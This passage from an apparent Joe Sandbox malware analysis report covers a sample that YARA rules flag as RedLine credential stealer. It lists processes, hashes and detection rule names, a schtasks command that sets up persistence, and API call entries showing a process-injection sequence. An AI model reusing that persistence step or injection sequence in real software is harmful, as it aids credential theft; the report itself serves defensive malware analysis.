                    Wow64 process (32bit):true
                    Commandline:C:\Users\user\AppData\Roaming\LjGABleGAy.exe
                    Imagebase:0xcb0000
                    File size:563'720 bytes
                    MD5 hash:304EA6D5CF3786D19DE14F004D7D057A
                    Has elevated privileges:false
                    Has administrator privileges:false
                    Programmed in:C, C++ or other language
                    Yara matches:
                    • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000000A.00000002.2218778326.000000000424B000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                    • Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 0000000A.00000002.2218778326.000000000424B000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                    • Rule: Windows_Trojan_RedLineStealer_f54632eb, Description: unknown, Source: 0000000A.00000002.2218778326.000000000424B000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                    Antivirus matches:
                    • Detection: 83%, ReversingLabs
                    • Detection: 43%, Virustotal, Browse
                    Reputation:low
                    Has exited:true

                    Target ID:11
                    Start time:22:12:08
                    Start date:26/07/2024
                    Path:C:\Windows\System32\wbem\WmiPrvSE.exe
                    Wow64 process (32bit):false
                    Commandline:C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
                    Imagebase:0x7ff6ef0c0000
                    File size:496'640 bytes
                    MD5 hash:60FF40CFD7FB8FE41EE4FE9AE5FE1C51
                    Has elevated privileges:true
                    Has administrator privileges:false
                    Programmed in:C, C++ or other language
                    Reputation:high
                    Has exited:true

                    Target ID:12
                    Start time:22:12:15
                    Start date:26/07/2024
                    Path:C:\Windows\SysWOW64\schtasks.exe
                    Wow64 process (32bit):true
                    Commandline:"C:\Windows\System32\schtasks.exe" /Create /TN "Updates\LjGABleGAy" /XML "C:\Users\user\AppData\Local\Temp\tmp5E88.tmp"
                    Imagebase:0x550000
                    File size:187'904 bytes
                    MD5 hash:48C2FE20575769DE916F48EF0676A965
                    Has elevated privileges:false
                    Has administrator privileges:false
                    Programmed in:C, C++ or other language
                    Reputation:high
                    Has exited:true

                    Target ID:13
                    Start time:22:12:15
                    Start date:26/07/2024
                    Path:C:\Windows\System32\conhost.exe
                    Wow64 process (32bit):false
                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                    Imagebase:0x7ff6d64d0000
                    File size:862'208 bytes
                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                    Has elevated privileges:false
                    Has administrator privileges:false
                    Programmed in:C, C++ or other language
                    Reputation:high
                    Has exited:true

                    Target ID:14
                    Start time:22:12:15
                    Start date:26/07/2024
                    Path:C:\Users\user\AppData\Roaming\LjGABleGAy.exe
                    Wow64 process (32bit):true
                    Commandline:"C:\Users\user\AppData\Roaming\LjGABleGAy.exe"
                    Imagebase:0x910000
                    File size:563'720 bytes
                    MD5 hash:304EA6D5CF3786D19DE14F004D7D057A
                    Has elevated privileges:false
                    Has administrator privileges:false
                    Programmed in:C, C++ or other language
                    Reputation:low
                    Has exited:true

                    Target ID:15
                    Start time:22:12:15
                    Start date:26/07/2024
                    Path:C:\Windows\System32\conhost.exe
                    Wow64 process (32bit):false
                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                    Imagebase:0x7ff6d64d0000
                    File size:862'208 bytes
                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                    Has elevated privileges:false
                    Has administrator privileges:false
                    Programmed in:C, C++ or other language
                    Reputation:high
                    Has exited:true


                      Execution Graph

                      Execution Coverage:11.8%
                      Dynamic/Decrypted Code Coverage:100%
                      Signature Coverage:3.1%
                      Total number of Nodes:320
                      Total number of Limit Nodes:16

                      Control-flow Graph

                      • Executed
                      • Not Executed
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.2132977723.0000000002D80000.00000040.00000800.00020000.00000000.sdmp, Offset: 02D80000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_2d80000_RgIbrhxoEx.jbxd
                      Similarity
                      • API ID:
                      • String ID: Te]q$Te]q$Te]q$Te]q$Te]q$$]q$$]q
                      • API String ID: 0-564603710
                      • Opcode ID: 93cc1dcc9de79529b7883314000ec1b70c58cc405d55c272e0e508a1888a2e41
                      • Instruction ID: 77592b844a1b2495a7096defa46e50497e781f6767ad37dbf8206be96e1b8717
                      • Opcode Fuzzy Hash: 93cc1dcc9de79529b7883314000ec1b70c58cc405d55c272e0e508a1888a2e41
                      • Instruction Fuzzy Hash: 4BD1C070F40244DFEB14AF68D959BAD7BF2FB88700F608965E542AB794EB748C05CB90

                      Control-flow Graph

                      • Executed
                      • Not Executed
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.2132977723.0000000002D80000.00000040.00000800.00020000.00000000.sdmp, Offset: 02D80000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_2d80000_RgIbrhxoEx.jbxd
                      Similarity
                      • API ID:
                      • String ID: Pp]q
                      • API String ID: 0-2528107101
                      • Opcode ID: 047f86716ffc8f8db8dde837711331a822de7b83308af9f26ae1d40aec21c7be
                      • Instruction ID: d44839db5188d9deb6e9b2ad60ae6babc72802b8cfcb7f8600681308bfafa355
                      • Opcode Fuzzy Hash: 047f86716ffc8f8db8dde837711331a822de7b83308af9f26ae1d40aec21c7be
                      • Instruction Fuzzy Hash: 87C2C334A01619CFDB64EF68C884AD9B7B6FF89301F1195E9D409AB365DB30AE85CF40

                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.2132977723.0000000002D80000.00000040.00000800.00020000.00000000.sdmp, Offset: 02D80000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_2d80000_RgIbrhxoEx.jbxd
                      Similarity
                      • API ID:
                      • String ID: Pp]q
                      • API String ID: 0-2528107101
                      • Opcode ID: 3018ae52ef1b862a90dd9836df9562bbecc2666fe7b8e73672b26a0833e1b59e
                      • Instruction ID: fe6089ed7883b8a71dc86a6b400267bc3df4a42379d6bd66548f66503fdae9bb
                      • Opcode Fuzzy Hash: 3018ae52ef1b862a90dd9836df9562bbecc2666fe7b8e73672b26a0833e1b59e
                      • Instruction Fuzzy Hash: 4BA2B234A506198FCB64EF68C884AD9B7B6FF89310F1186E9D5096B364DB31AEC5CF40
                      Memory Dump Source
                      • Source File: 00000000.00000002.2131400882.0000000001320000.00000040.00000800.00020000.00000000.sdmp, Offset: 01320000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_1320000_RgIbrhxoEx.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 9d67bb2773af7f5113f6e0cf2d8e6afb282d6a3c08bfe6c042486c380830dd8e
                      • Instruction ID: c361ba83fc6f02661eef2e508e478eb6c54afa310913ba442b5ccb0b74730d88
                      • Opcode Fuzzy Hash: 9d67bb2773af7f5113f6e0cf2d8e6afb282d6a3c08bfe6c042486c380830dd8e
                      • Instruction Fuzzy Hash: 7AE0E279D49139DACB22AF58A4502F8B3BDBB6F629F0024A1D50EA3901C3308A958A55
                      Memory Dump Source
                      • Source File: 00000000.00000002.2131400882.0000000001320000.00000040.00000800.00020000.00000000.sdmp, Offset: 01320000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_1320000_RgIbrhxoEx.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: fa7c243e25ae0e677cbf8774a2f12f313cfe710012b09501413043abc33b3d58
                      • Instruction ID: ed551d31e1edcbe1ee343e3cb2f5338ed3a26b7503e31534736fbdff1ff34b23
                      • Opcode Fuzzy Hash: fa7c243e25ae0e677cbf8774a2f12f313cfe710012b09501413043abc33b3d58
                      • Instruction Fuzzy Hash: A4C08C36D8F03CD6CA023AA438000F8F73CAAAB469F003092C10EA3C12C0108A290268

                      APIs
                      • GetCurrentProcess.KERNEL32 ref: 0137D37E
                      • GetCurrentThread.KERNEL32 ref: 0137D3BB
                      • GetCurrentProcess.KERNEL32 ref: 0137D3F8
                      • GetCurrentThreadId.KERNEL32 ref: 0137D451
                      Memory Dump Source
                      • Source File: 00000000.00000002.2131460876.0000000001370000.00000040.00000800.00020000.00000000.sdmp, Offset: 01370000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_1370000_RgIbrhxoEx.jbxd
                      Similarity
                      • API ID: Current$ProcessThread
                      • String ID:
                      • API String ID: 2063062207-0
                      • Opcode ID: 974697c5cff6409249e4e4aa4240b9b42aa8c8b8a8beb8ef45aaad75e5a1154b
                      • Instruction ID: 0730e7076a9ccdf8296a32cd2460e82b9a9af2336d6c3da16c219688bc1d608d
                      • Opcode Fuzzy Hash: 974697c5cff6409249e4e4aa4240b9b42aa8c8b8a8beb8ef45aaad75e5a1154b
                      • Instruction Fuzzy Hash: 3B5156B0900349CFDB19DFAAD648BAEBFF1EF49304F248459E009A73A1D7385948CB65

                      APIs
                      • GetCurrentProcess.KERNEL32 ref: 0137D37E
                      • GetCurrentThread.KERNEL32 ref: 0137D3BB
                      • GetCurrentProcess.KERNEL32 ref: 0137D3F8
                      • GetCurrentThreadId.KERNEL32 ref: 0137D451
                      Memory Dump Source
                      • Source File: 00000000.00000002.2131460876.0000000001370000.00000040.00000800.00020000.00000000.sdmp, Offset: 01370000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_1370000_RgIbrhxoEx.jbxd
                      Similarity
                      • API ID: Current$ProcessThread
                      • String ID:
                      • API String ID: 2063062207-0
                      • Opcode ID: b4bbf2b32039032bd1ecfce365d370fc3e905eac0d46670cca82e96712195d87
                      • Instruction ID: d0fa3b4b31f5ba2048d3b4f6ae7cf54561c611648cbc0e8cb252cb80324fd139
                      • Opcode Fuzzy Hash: b4bbf2b32039032bd1ecfce365d370fc3e905eac0d46670cca82e96712195d87
                      • Instruction Fuzzy Hash: 505138B0900349CFDB18DFAAD648BAEBBF1FF48304F208459E409A7360D7385948CB65

                      APIs
                      • CreateProcessA.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 01323C16
                      Memory Dump Source
                      • Source File: 00000000.00000002.2131400882.0000000001320000.00000040.00000800.00020000.00000000.sdmp, Offset: 01320000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_1320000_RgIbrhxoEx.jbxd
                      Similarity
                      • API ID: CreateProcess
                      • String ID:
                      • API String ID: 963392458-0
                      • Opcode ID: 0bab78ff0d107b09e525c03b9d6ad9bdaf27beb577c68944d7240c339a3cf26d
                      • Instruction ID: 3fec0271f9cb3fb892fec584270b0624acf4326e979f8ead0c04f5b46113afc0
                      • Opcode Fuzzy Hash: 0bab78ff0d107b09e525c03b9d6ad9bdaf27beb577c68944d7240c339a3cf26d
                      • Instruction Fuzzy Hash: E1914C71D00629CFEF24DF69C841BEDBBB2BF48314F14856AD808A7280DB789985CF91

                      APIs
                      • CreateProcessA.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 01323C16
                      Memory Dump Source
                      • Source File: 00000000.00000002.2131400882.0000000001320000.00000040.00000800.00020000.00000000.sdmp, Offset: 01320000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_1320000_RgIbrhxoEx.jbxd
                      Similarity
                      • API ID: CreateProcess
                      • String ID:
                      • API String ID: 963392458-0
                      • Opcode ID: eb0d198c568d92faa39e3112cf0b20f7f6805061209acf51aed8bcc57227469c
                      • Instruction ID: 0d6243bb42a7068207d46d3b8b97d8e74c1fba6d082e68ecbb13b35ad9f2f0de
                      • Opcode Fuzzy Hash: eb0d198c568d92faa39e3112cf0b20f7f6805061209acf51aed8bcc57227469c
                      • Instruction Fuzzy Hash: 34914D71D00629DFEF24DF69C841BEDBBB2BF48714F14856AD808A7280DB789985CF91

                      APIs
                      • GetModuleHandleW.KERNEL32(00000000), ref: 0137B2C6
                      Memory Dump Source
                      • Source File: 00000000.00000002.2131460876.0000000001370000.00000040.00000800.00020000.00000000.sdmp, Offset: 01370000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_1370000_RgIbrhxoEx.jbxd
                      Similarity
                      • API ID: HandleModule
                      • String ID:
                      • API String ID: 4139908857-0
                      • Opcode ID: 8f3d19919361880f805c19dc9e655f5bbcde16d10f5d3f7ec6f47d77d053322c
                      • Instruction ID: a9ce593a51d757512797c9923da576049059b85834a8018f62363049030f00a8
                      • Opcode Fuzzy Hash: 8f3d19919361880f805c19dc9e655f5bbcde16d10f5d3f7ec6f47d77d053322c
                      • Instruction Fuzzy Hash: 7C713470A00B058FE724DF2AD54475ABBF5FF88304F00892DD48ADBA54DB79E945CB90

                      APIs
                      • CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 02D81E02
                      Memory Dump Source
                      • Source File: 00000000.00000002.2132977723.0000000002D80000.00000040.00000800.00020000.00000000.sdmp, Offset: 02D80000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_2d80000_RgIbrhxoEx.jbxd
                      Similarity
                      • API ID: CreateWindow
                      • String ID:
                      • API String ID: 716092398-0
                      • Opcode ID: 743e7c52673f580b806bf10d15178a9c23e0fc2bfa209e6ee0c55148fbcb943b
                      • Instruction ID: 0c62ee665e09b48123964c1efd5f968fa7d4b17b0c708f4c32a76688cdc712c0
                      • Opcode Fuzzy Hash: 743e7c52673f580b806bf10d15178a9c23e0fc2bfa209e6ee0c55148fbcb943b
                      • Instruction Fuzzy Hash: 4351E0B1D00309DFDB14DF9AC984ADEFBB5BF48300F64812AE418AB210D775A885CF90
                      APIs
                      • CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 02D81E02
                      Memory Dump Source
                      • Source File: 00000000.00000002.2132977723.0000000002D80000.00000040.00000800.00020000.00000000.sdmp, Offset: 02D80000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_2d80000_RgIbrhxoEx.jbxd
                      Similarity
                      • API ID: CreateWindow
                      • String ID:
                      • API String ID: 716092398-0
                      • Opcode ID: df4da44883e9f4b2a7b9d841d26d7c1e8f54222c3cb73eda180402bf14a4d71b
                      • Instruction ID: 745d923a26aff7fcbeff143f536256c64f633995ebc81d5c6a3fe7d602e968a6
                      • Opcode Fuzzy Hash: df4da44883e9f4b2a7b9d841d26d7c1e8f54222c3cb73eda180402bf14a4d71b
                      • Instruction Fuzzy Hash: DB41B0B1D00319DFDB14DF9AC984ADEBBB5BF48314F24852AE819AB210D775A885CF90
                      APIs
                      • CreateActCtxA.KERNEL32(?), ref: 013759C9
                      Memory Dump Source
                      • Source File: 00000000.00000002.2131460876.0000000001370000.00000040.00000800.00020000.00000000.sdmp, Offset: 01370000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_1370000_RgIbrhxoEx.jbxd
                      Similarity
                      • API ID: Create
                      • String ID:
                      • API String ID: 2289755597-0
                      • Opcode ID: 7ecb996a780e79dc960c58978f2382b475706dd2fa9b9dbface5a655e3f3e26d
                      • Instruction ID: 3b8fb38a9cf324b8989b3b4ddc19552f39e2261099024dfd8a41d7fb68661507
                      • Opcode Fuzzy Hash: 7ecb996a780e79dc960c58978f2382b475706dd2fa9b9dbface5a655e3f3e26d
                      • Instruction Fuzzy Hash: 3041F2B1C00719CBDB29DFAAC9847CDBBF1BF49304F20846AD409AB260DB756946CF50
                      APIs
                      • CallWindowProcW.USER32(?,?,?,?,?), ref: 02D84381
                      Memory Dump Source
                      • Source File: 00000000.00000002.2132977723.0000000002D80000.00000040.00000800.00020000.00000000.sdmp, Offset: 02D80000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_2d80000_RgIbrhxoEx.jbxd
                      Similarity
                      • API ID: CallProcWindow
                      • String ID:
                      • API String ID: 2714655100-0
                      • Opcode ID: 026decd6a36da2bdd1114bf74d07f53955fe4eac66cd030b3df4d2385d714997
                      • Instruction ID: c8efeb073c72bb9e08185e5d5dfe2883449959683a89d1691a51481a485ff8c4
                      • Opcode Fuzzy Hash: 026decd6a36da2bdd1114bf74d07f53955fe4eac66cd030b3df4d2385d714997
                      • Instruction Fuzzy Hash: 9D411AB49003059FCB14DF9AC448AAAFBF5FF89314F24C459E559AB361D374A841CFA0
                      APIs
                      • CreateActCtxA.KERNEL32(?), ref: 013759C9
                      Memory Dump Source
                      • Source File: 00000000.00000002.2131460876.0000000001370000.00000040.00000800.00020000.00000000.sdmp, Offset: 01370000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_1370000_RgIbrhxoEx.jbxd
                      Similarity
                      • API ID: Create
                      • String ID:
                      • API String ID: 2289755597-0
                      • Opcode ID: 42958f6a7ce4ba58052226ad89203c57ae4e2a533b1649b47ea79a10ddb20231
                      • Instruction ID: 7e9905269b3af5e37036ddf39ac8d67bb39cff8ae0e40573e6e8e1481923d0a5
                      • Opcode Fuzzy Hash: 42958f6a7ce4ba58052226ad89203c57ae4e2a533b1649b47ea79a10ddb20231
                      • Instruction Fuzzy Hash: 3841C5B0C0071DCBDB29DFAAC844B9DBBF5BF49304F20806AD409AB255D7755946CF91
                      APIs
                      • VirtualAllocEx.KERNEL32(?,?,?,?,?), ref: 01323706
                      Memory Dump Source
                      • Source File: 00000000.00000002.2131400882.0000000001320000.00000040.00000800.00020000.00000000.sdmp, Offset: 01320000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_1320000_RgIbrhxoEx.jbxd
                      Similarity
                      • API ID: AllocVirtual
                      • String ID:
                      • API String ID: 4275171209-0
                      • Opcode ID: 817780d3c944cfc199c0222b3ac62bd0fc05ae9a54b491a66e8aed6884cf34a9
                      • Instruction ID: 69100ad41b3c286d50b99b6fffb2f9b148116b15484bf3fcd846ce6a78f22d42
                      • Opcode Fuzzy Hash: 817780d3c944cfc199c0222b3ac62bd0fc05ae9a54b491a66e8aed6884cf34a9
                      • Instruction Fuzzy Hash: 19215C768002199FDB20EFAAC8457EEFFF5FF88324F14841AD519A7250CB399541CBA0
                      APIs
                      • WriteProcessMemory.KERNEL32(?,?,00000000,?,?), ref: 013237E8
                      Memory Dump Source
                      • Source File: 00000000.00000002.2131400882.0000000001320000.00000040.00000800.00020000.00000000.sdmp, Offset: 01320000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_1320000_RgIbrhxoEx.jbxd
                      Similarity
                      • API ID: MemoryProcessWrite
                      • String ID:
                      • API String ID: 3559483778-0
                      • Opcode ID: f0f359f7f067f1c447f951df6650b19ed594938a1fb9bddcf2276d82dd1c849b
                      • Instruction ID: 67a6e55aee90b53494effde1e9404dc8a17641b303cc3335edb03c04d781645e
                      • Opcode Fuzzy Hash: f0f359f7f067f1c447f951df6650b19ed594938a1fb9bddcf2276d82dd1c849b
                      • Instruction Fuzzy Hash: F42126B59002199FCF14DFAEC885BEEBBF5FF48314F10842AE918A7240C7789544CBA0
                      APIs
                      • WriteProcessMemory.KERNEL32(?,?,00000000,?,?), ref: 013237E8
                      Memory Dump Source
                      • Source File: 00000000.00000002.2131400882.0000000001320000.00000040.00000800.00020000.00000000.sdmp, Offset: 01320000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_1320000_RgIbrhxoEx.jbxd
                      Similarity
                      • API ID: MemoryProcessWrite
                      • String ID:
                      • API String ID: 3559483778-0
                      • Opcode ID: d621b4167bd28c657689dbc768a7a682a0fa238a01629a87119d2a493ea4a857
                      • Instruction ID: d4b9fcba8cb5da96dbd00caa46ff4116c38a3070e33d18b0910617b3eabffc9e
                      • Opcode Fuzzy Hash: d621b4167bd28c657689dbc768a7a682a0fa238a01629a87119d2a493ea4a857
                      • Instruction Fuzzy Hash: 1B21F6B59003599FDB10DFAAC985BEEBBF5FF48314F10842AE919A7240D7789944CBA0
                      APIs
                      • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 0137D5CF
                      Memory Dump Source
                      • Source File: 00000000.00000002.2131460876.0000000001370000.00000040.00000800.00020000.00000000.sdmp, Offset: 01370000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_1370000_RgIbrhxoEx.jbxd
                      Similarity
                      • API ID: DuplicateHandle
                      • String ID:
                      • API String ID: 3793708945-0
                      • Opcode ID: c1c675ce8a6560b5be17ac3f439a5e79c479d82ad07ed06240b2c3297de2d288
                      • Instruction ID: 53166c7fac519bcbf293fabdbe50594a789e3dc1bae12a988ccce8b103946f4f
                      • Opcode Fuzzy Hash: c1c675ce8a6560b5be17ac3f439a5e79c479d82ad07ed06240b2c3297de2d288
                      • Instruction Fuzzy Hash: A421D4B59002099FDB10DFAAD984ADEBBF5FB48324F14841AE918A7250D379A944CFA4
                      APIs
                      • ReadProcessMemory.KERNEL32(?,?,?,?,?), ref: 013238C8
                      Memory Dump Source
                      • Source File: 00000000.00000002.2131400882.0000000001320000.00000040.00000800.00020000.00000000.sdmp, Offset: 01320000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_1320000_RgIbrhxoEx.jbxd
                      Similarity
                      • API ID: MemoryProcessRead
                      • String ID:
                      • API String ID: 1726664587-0
                      • Opcode ID: 1ab316ed40b8ce5b5bf7d1d5486284f7fd0be33c5623955f60cfe25f8edeeb4d
                      • Instruction ID: 1f4629b9a23d16b758ad73f6f71e25a040ed30c5591c0448badaf6e2df5507f1
                      • Opcode Fuzzy Hash: 1ab316ed40b8ce5b5bf7d1d5486284f7fd0be33c5623955f60cfe25f8edeeb4d
                      • Instruction Fuzzy Hash: E52139B19002198FCB10DFAAC8806EEFBF5FF48310F10842AE519A7240C7789545CBA0
                      APIs
                      • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 0132363E
                      Memory Dump Source
                      • Source File: 00000000.00000002.2131400882.0000000001320000.00000040.00000800.00020000.00000000.sdmp, Offset: 01320000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_1320000_RgIbrhxoEx.jbxd
                      Similarity
                      • API ID: ContextThreadWow64
                      • String ID:
                      • API String ID: 983334009-0
                      • Opcode ID: a47f008defe95b43d3da476b18fcd8d80dfce21d24e36f9fd899a798bf1cd5b1
                      • Instruction ID: bb81a534c914e7cf6c87df6b575db706a4474eb4ed861b421a0d52a255f5cde7
                      • Opcode Fuzzy Hash: a47f008defe95b43d3da476b18fcd8d80dfce21d24e36f9fd899a798bf1cd5b1
                      • Instruction Fuzzy Hash: 082139719003198FDB20DFAAC4857EEBBF4FF49324F10842AD559A7340D7789945CBA1
                      APIs
                      • ReadProcessMemory.KERNEL32(?,?,?,?,?), ref: 013238C8
                      Memory Dump Source
                      • Source File: 00000000.00000002.2131400882.0000000001320000.00000040.00000800.00020000.00000000.sdmp, Offset: 01320000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_1320000_RgIbrhxoEx.jbxd
                      Similarity
                      • API ID: MemoryProcessRead
                      • String ID:
                      • API String ID: 1726664587-0
                      • Opcode ID: 6e865f2ac3d71f6b3f2d7d7c0acb2d5a9c10fede56aa238937663a51c01dcb3d
                      • Instruction ID: 6a5fc024125cb248fa43ba163022fddcd8ec62a596fded0800ac1643d338a935
                      • Opcode Fuzzy Hash: 6e865f2ac3d71f6b3f2d7d7c0acb2d5a9c10fede56aa238937663a51c01dcb3d
                      • Instruction Fuzzy Hash: 972139B1C003599FCB10DFAAC880AEEFBF5FF48310F10882AE519A7240C778A544CBA0
                      APIs
                      • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 0132363E
                      Memory Dump Source
                      • Source File: 00000000.00000002.2131400882.0000000001320000.00000040.00000800.00020000.00000000.sdmp, Offset: 01320000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_1320000_RgIbrhxoEx.jbxd
                      Similarity
                      • API ID: ContextThreadWow64
                      • String ID:
                      • API String ID: 983334009-0
                      • Opcode ID: ac788b96bd789a6daa16ed0c86ca01696c6abb8fc9e3d45f1daa38f03965b528
                      • Instruction ID: 4f3cf31ed04ab099dae03c592c42476cae4cb4961c155c690bf5ff48cf55439d
                      • Opcode Fuzzy Hash: ac788b96bd789a6daa16ed0c86ca01696c6abb8fc9e3d45f1daa38f03965b528
                      • Instruction Fuzzy Hash: D42134B19002198FDB20DFAAC4857AEBBF4FF48324F10842AD559A7240CB78A945CBA0
                      APIs
                      • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 0137D5CF
                      Memory Dump Source
                      • Source File: 00000000.00000002.2131460876.0000000001370000.00000040.00000800.00020000.00000000.sdmp, Offset: 01370000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_1370000_RgIbrhxoEx.jbxd
                      Similarity
                      • API ID: DuplicateHandle
                      • String ID:
                      • API String ID: 3793708945-0
                      • Opcode ID: a38755fe40d5d0cdbfcfed4d1807ffbd959b771fa4eaf499facd7fa16b0bc5f4
                      • Instruction ID: c5d7792b3c6110d863a1f751d71ee23b125fae0f4af752f8699193e311d4d105
                      • Opcode Fuzzy Hash: a38755fe40d5d0cdbfcfed4d1807ffbd959b771fa4eaf499facd7fa16b0bc5f4
                      • Instruction Fuzzy Hash: D421E6B59002089FDB10CF9AD584ADEBFF4FF48314F14841AE914A3310D378A944CFA4
                      APIs
                      • LoadLibraryExW.KERNEL32(00000000,00000000,?,?,?,?,00000000,?,0137B341,00000800,00000000,00000000), ref: 0137B552
                      Memory Dump Source
                      • Source File: 00000000.00000002.2131460876.0000000001370000.00000040.00000800.00020000.00000000.sdmp, Offset: 01370000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_1370000_RgIbrhxoEx.jbxd
                      Similarity
                      • API ID: LibraryLoad
                      • String ID:
                      • API String ID: 1029625771-0
                      • Opcode ID: 1d483f1af290723e627f7136630a469a878e60e7589e9a3cf29df91416a7ddc8
                      • Instruction ID: da21a758c8f31e4b64cca6c6c03a6bff4cfbef00821f3f58a930886c8fc6ae08
                      • Opcode Fuzzy Hash: 1d483f1af290723e627f7136630a469a878e60e7589e9a3cf29df91416a7ddc8
                      • Instruction Fuzzy Hash: 481112B6800349CFDB20DF9AC448B9EFBF8EB48324F10842AE519A7210C379A545CFA4
                      APIs
                      • LoadLibraryExW.KERNEL32(00000000,00000000,?,?,?,?,00000000,?,0137B341,00000800,00000000,00000000), ref: 0137B552
                      Memory Dump Source
                      • Source File: 00000000.00000002.2131460876.0000000001370000.00000040.00000800.00020000.00000000.sdmp, Offset: 01370000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_1370000_RgIbrhxoEx.jbxd
                      Similarity
                      • API ID: LibraryLoad
                      • String ID:
                      • API String ID: 1029625771-0
                      • Opcode ID: 8197f048688c9baedae75c50a85c3966ac645d54b244d16c5ff4a1da1829b944
                      • Instruction ID: 62a7bb41892cbed96925a37a737a3764e54688ef84247489358309b607ed7f0f
                      • Opcode Fuzzy Hash: 8197f048688c9baedae75c50a85c3966ac645d54b244d16c5ff4a1da1829b944
                      • Instruction Fuzzy Hash: C31114B6800349DFDB20CF9AD444ADEFBF5EB48324F14841AD519A7200C379A545CFA0
                      APIs
                      • VirtualAllocEx.KERNEL32(?,?,?,?,?), ref: 01323706
                      Memory Dump Source
                      • Source File: 00000000.00000002.2131400882.0000000001320000.00000040.00000800.00020000.00000000.sdmp, Offset: 01320000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_1320000_RgIbrhxoEx.jbxd
                      Similarity
                      • API ID: AllocVirtual
                      • String ID:
                      • API String ID: 4275171209-0
                      • Opcode ID: 839bcc028d764b08d2a12b1bc8c2111b030c512a40473e2b59bf1d29d1366957
                      • Instruction ID: 7f4432b873096a69d5238bc389a3ade495ac8651236cde2f71bd067c521d129e
                      • Opcode Fuzzy Hash: 839bcc028d764b08d2a12b1bc8c2111b030c512a40473e2b59bf1d29d1366957
                      • Instruction Fuzzy Hash: CF1137B58002499FCB10DFAAC844AEEBFF5FF48314F108819E519A7250C779A544CFA0
                      APIs
                      Memory Dump Source
                      • Source File: 00000000.00000002.2131400882.0000000001320000.00000040.00000800.00020000.00000000.sdmp, Offset: 01320000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_1320000_RgIbrhxoEx.jbxd
                      Similarity
                      • API ID: ResumeThread
                      • String ID:
                      • API String ID: 947044025-0
                      • Opcode ID: 42285c50787c67f72fdd5edf63fd6c1d8f1f6acc11b7b116464ea75833178876
                      • Instruction ID: 73c67dc83d296bdd7f4489c955e7e29939d2b27ddb89a78e8eb01b5d083dfb0b
                      • Opcode Fuzzy Hash: 42285c50787c67f72fdd5edf63fd6c1d8f1f6acc11b7b116464ea75833178876
                      • Instruction Fuzzy Hash: 0B1128B1D002498FDB24DFAAC4457AEFBF5EF89314F208419D519A7240CB79A544CBA0
                      APIs
                      Memory Dump Source
                      • Source File: 00000000.00000002.2131400882.0000000001320000.00000040.00000800.00020000.00000000.sdmp, Offset: 01320000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_1320000_RgIbrhxoEx.jbxd
                      Similarity
                      • API ID: ResumeThread
                      • String ID:
                      • API String ID: 947044025-0
                      • Opcode ID: 3ea3d2e1c895531fe618b07d7da5bc18a73bb2f9ea866d4edf7a8599d956b5d1
